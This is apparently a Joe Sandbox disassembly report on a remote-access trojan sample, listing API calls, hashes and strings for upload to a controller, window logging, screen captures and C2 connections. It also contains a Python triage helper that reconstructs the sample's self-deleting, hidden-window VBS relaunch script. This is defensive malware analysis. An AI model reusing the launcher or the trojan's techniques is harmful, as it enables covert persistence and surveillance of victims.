                                                  • API String ID: 3795512280-3163867910
                                                  • Opcode ID: f1eb223cb7d2e6894d1a2c78ceddde7f199078b5105718b7a6d2036e1116f8b0
                                                  • Instruction ID: 17589b7211b6a8874efeedd8214cf8ff24982be95156d90f0dc16a86b4d8e67c
                                                  • Opcode Fuzzy Hash: f1eb223cb7d2e6894d1a2c78ceddde7f199078b5105718b7a6d2036e1116f8b0
                                                  • Instruction Fuzzy Hash: 7B51DE313843045FCBA9BB708861AFE379BABC0300F04042DEF56A7AD5DF258909EA55
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                  • _free.LIBCMT ref: 004500A6
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 004500C8
                                                  • _free.LIBCMT ref: 004500DD
                                                  • _free.LIBCMT ref: 004500E8
                                                  • _free.LIBCMT ref: 0045010A
                                                  • _free.LIBCMT ref: 0045011D
                                                  • _free.LIBCMT ref: 0045012B
                                                  • _free.LIBCMT ref: 00450136
                                                  • _free.LIBCMT ref: 0045016E
                                                  • _free.LIBCMT ref: 00450175
                                                  • _free.LIBCMT ref: 00450192
                                                  • _free.LIBCMT ref: 004501AA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                  • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                  • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                  • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 02140318
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F567
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F579
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F58B
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F59D
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F5AF
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F5C1
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F5D3
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F5E5
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F5F7
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F609
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F61B
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F62D
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F63F
                                                  • _free.LIBCMT ref: 0214030D
                                                    • Part of subcall function 02136D2C: HeapFree.KERNEL32(00000000,00000000,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?), ref: 02136D42
                                                    • Part of subcall function 02136D2C: GetLastError.KERNEL32(?,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?,?), ref: 02136D54
                                                  • _free.LIBCMT ref: 0214032F
                                                  • _free.LIBCMT ref: 02140344
                                                  • _free.LIBCMT ref: 0214034F
                                                  • _free.LIBCMT ref: 02140371
                                                  • _free.LIBCMT ref: 02140384
                                                  • _free.LIBCMT ref: 02140392
                                                  • _free.LIBCMT ref: 0214039D
                                                  • _free.LIBCMT ref: 021403D5
                                                  • _free.LIBCMT ref: 021403DC
                                                  • _free.LIBCMT ref: 021403F9
                                                  • _free.LIBCMT ref: 02140411
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                  • Instruction ID: 8a4563374bf0aee5d18d6233fee54d11180536f716a3e30866a004d90382fc5a
                                                  • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                  • Instruction Fuzzy Hash: E7316131684244EFEB65AA3AD844B5B7BEBEF09364F144429E59CD7160DF33AC40CB14
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 021011AC
                                                    • Part of subcall function 02102A3C: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 02102A4A
                                                    • Part of subcall function 02102A3C: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A65
                                                    • Part of subcall function 02102A3C: RegCloseKey.ADVAPI32(?,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A70
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 021011E8
                                                  • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 0210124D
                                                    • Part of subcall function 0210271E: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0210273E
                                                    • Part of subcall function 0210271E: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0210275C
                                                    • Part of subcall function 0210271E: RegCloseKey.ADVAPI32(00000000), ref: 02102767
                                                  • CloseHandle.KERNEL32(00000000), ref: 021011F7
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 021014C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                  • String ID: 0DG$TTF$WDH$BG
                                                  • API String ID: 65172268-1505503698
                                                  • Opcode ID: cfd1e48dead6c5d3f6b6817fbfe2d8e6c01e86e7030477cd0b94be603cb5524d
                                                  • Instruction ID: f84e7e7ad867c44496a89037f13e781339e9bf9fed8f9eada3ec486b66b34828
                                                  • Opcode Fuzzy Hash: cfd1e48dead6c5d3f6b6817fbfe2d8e6c01e86e7030477cd0b94be603cb5524d
                                                  • Instruction Fuzzy Hash: A871C1326C43006FC654FB70DC95AEF73A6AF90350F40052EFA46929E1EF649909DEA7
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0041912D
                                                  • 70165D90.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                  • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                  • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$70165CreateDirectoryH_prologLocalTime
                                                  • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                  • API String ID: 1387268161-65789007
                                                  • Opcode ID: 91d1b4f4dea65f3b826fcaa200c07d0103cb4320fd1aa60c718ca5279f5f8068
                                                  • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                  • Opcode Fuzzy Hash: 91d1b4f4dea65f3b826fcaa200c07d0103cb4320fd1aa60c718ca5279f5f8068
                                                  • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                  APIs
                                                  • connect.WS2_32(?,?,?), ref: 004042A5
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                  • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: e3513f9c1ab322e1df1fdf0f0d61d53c5181b1f05cce72afbaf14f0eb0156f5d
                                                  • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                  • Opcode Fuzzy Hash: e3513f9c1ab322e1df1fdf0f0d61d53c5181b1f05cce72afbaf14f0eb0156f5d
                                                  • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                  APIs
                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                    • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                    • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                    • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                  • ExitProcess.KERNEL32 ref: 0040C832
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                  • API String ID: 1913171305-390638927
                                                  • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                  • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                  • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                  • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                  • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                  • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                  • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                  • closesocket.WS2_32(?), ref: 0040481F
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                  • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                  • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                  • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 020F81B3
                                                  • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 020F8229
                                                  • __aulldiv.LIBCMT ref: 020F8250
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 020F8374
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 020F838F
                                                  • CloseHandle.KERNEL32(00000000), ref: 020F8467
                                                  • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 020F8481
                                                  • CloseHandle.KERNEL32(00000000), ref: 020F84BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                  • String ID: Uploading file to Controller: $>G
                                                  • API String ID: 1884690901-111729153
                                                  • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                  • Instruction ID: 813cc19cc932cfaae91a7a6635d79dbd298549f455b6f4c7360dade82b47339a
                                                  • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                  • Instruction Fuzzy Hash: 05B1A1716883409FD694FB24C890BEFB7E6AF94310F40891DFA8942690EF749909DF97
                                                  APIs
                                                    • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                  • GetLastError.KERNEL32 ref: 00454A96
                                                  • __dosmaperr.LIBCMT ref: 00454A9D
                                                  • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                  • GetLastError.KERNEL32 ref: 00454AB3
                                                  • __dosmaperr.LIBCMT ref: 00454ABC
                                                  • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                  • CloseHandle.KERNEL32(?), ref: 00454C26
                                                  • GetLastError.KERNEL32 ref: 00454C58
                                                  • __dosmaperr.LIBCMT ref: 00454C5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                  • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                  • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                  • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 02109394
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 02109452
                                                  • Sleep.KERNEL32(000003E8), ref: 021094D4
                                                  • GetLocalTime.KERNEL32(?), ref: 021094E3
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 021095CC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CreateDirectoryH_prologLocalTime
                                                  • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                  • API String ID: 3069631530-65789007
                                                  • Opcode ID: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                  • Instruction ID: 859576e852741ae05360a9cb9d084373eeed00e0442fc4846c4db51702b7a627
                                                  • Opcode Fuzzy Hash: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                  • Instruction Fuzzy Hash: DB51D472A803589ECF54BBB4CC94AFE77BAAF40300F000029E905A79C6EF645E45EB51
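Two of the functions above leave host artifacts an incident responder can look for: the ShellExecuteW routine at 0040C6C7 builds a .vbs in Temp from the fragments `CreateObject("WScript.Shell").Run "cmd /c ""`, `"""`, `0` and `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)` (a relaunch stub that runs the exepath in a hidden window and then removes itself), and the CreateDirectoryW/GetLocalTime routine at 02109394 names captures with `time_%04i%02i%02i_%02i%02i%02i` and `wnd_%04i%02i%02i_%02i%02i%02i`. The triage helper below is an added example written for this report, not code from Joe Sandbox or from the sample; the reassembled .vbs text, the exe path, the file extension on capture names and the function names are assumptions, the report itself lists only the fragments and format strings.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Constructed sample: the launcher reassembled from the string fragments the
# report lists for the ShellExecuteW function. Path and line layout of the real
# dropped file are assumptions.
SAMPLE_VBS = (
    r'CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\victim\AppData\Roaming\remcos\remcos.exe""", 0' "\r\n"
    r'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)' "\r\n"
)

# In VBScript a doubled quote inside a string literal is a literal quote, so
# "cmd /c ""<path>""" is the single argument  cmd /c "<path>"  and the trailing
# 0 is WshShell.Run's intWindowStyle (0 = hidden window).
_RUN_RE = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd\s*/c\s*""(?P<cmd>.+?)"""'
    r'(?:\s*,\s*(?P<style>\d+))?',
    re.IGNORECASE,
)
_SELF_DELETE_RE = re.compile(
    r'CreateObject\("Scripting\.FileSystemObject"\)\.DeleteFile\(\s*Wscript\.ScriptFullName\s*\)',
    re.IGNORECASE,
)

# Names produced by the time_/wnd_ format strings fed with GetLocalTime output.
# The extension is an assumption; the report shows only the name format.
_CAPTURE_RE = re.compile(r'^(?P<kind>time|wnd)_(?P<stamp>\d{8}_\d{6})(?:\.[A-Za-z0-9]+)?$')


@dataclass(frozen=True)
class Launcher:
    command: str          # what cmd /c is asked to run (the RAT's own exepath)
    hidden_window: bool   # True when Run's window style is 0
    self_deletes: bool    # True when the script removes itself afterwards


def analyze_launcher(vbs_text: str) -> Optional[Launcher]:
    """Return a Launcher if the text matches the self-deleting .vbs relaunch stub."""
    m = _RUN_RE.search(vbs_text)
    if m is None:
        return None
    style = m.group("style")
    return Launcher(
        command=m.group("cmd").strip(),
        hidden_window=(style is not None and int(style) == 0),
        self_deletes=_SELF_DELETE_RE.search(vbs_text) is not None,
    )


def parse_capture_name(name: str) -> Optional[Tuple[str, datetime]]:
    """Return (kind, local timestamp) for time_/wnd_ capture names, else None."""
    m = _CAPTURE_RE.match(name)
    if m is None:
        return None
    try:
        stamp = datetime.strptime(m.group("stamp"), "%Y%m%d_%H%M%S")
    except ValueError:  # e.g. wnd_20250199_250000 has the shape but is not a date
        return None
    return m.group("kind"), stamp


def triage(temp_files: Dict[str, str], capture_names: List[str]) -> List[str]:
    """Summarise indicators from %Temp% script contents and a capture directory listing."""
    findings: List[str] = []
    for fname, content in temp_files.items():
        if not fname.lower().endswith(".vbs"):
            continue
        hit = analyze_launcher(content)
        if hit is not None and hit.self_deletes:
            findings.append(
                f"{fname}: self-deleting launcher runs {hit.command!r}"
                + (" with a hidden window" if hit.hidden_window else "")
            )
    stamps = [s for s in (parse_capture_name(n) for n in capture_names) if s is not None]
    if stamps:
        first = min(t for _, t in stamps)
        last = max(t for _, t in stamps)
        findings.append(
            f"{len(stamps)} capture artifacts between {first:%Y-%m-%d %H:%M:%S} and {last:%Y-%m-%d %H:%M:%S}"
        )
    return findings


if __name__ == "__main__":
    listing = ["time_20250110_091500.jpg", "wnd_20250110_091531.jpg", "readme.txt"]
    for line in triage({"runner.vbs": SAMPLE_VBS}, listing):
        print(line)
```

The launcher check requires both the `cmd /c` Run and the `DeleteFile(Wscript.ScriptFullName)` call before it reports a hit, because the Run line alone is common in benign logon scripts; the capture parser rejects names that have the right shape but no valid date, so a timeline built from it cannot be skewed by junk files.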
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040A456
                                                  • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                  • GetForegroundWindow.USER32 ref: 0040A467
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                  • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(00000000,?,00000000,0040A91C,00000000), ref: 00409D84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                  • API String ID: 911427763-3954389425
                                                  • Opcode ID: 53cfb5b2237c6fd0928d653138945363214ed6665f98bbf910386678ddebf1eb
                                                  • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                  • Opcode Fuzzy Hash: 53cfb5b2237c6fd0928d653138945363214ed6665f98bbf910386678ddebf1eb
                                                  • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                  • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                  • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                  • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
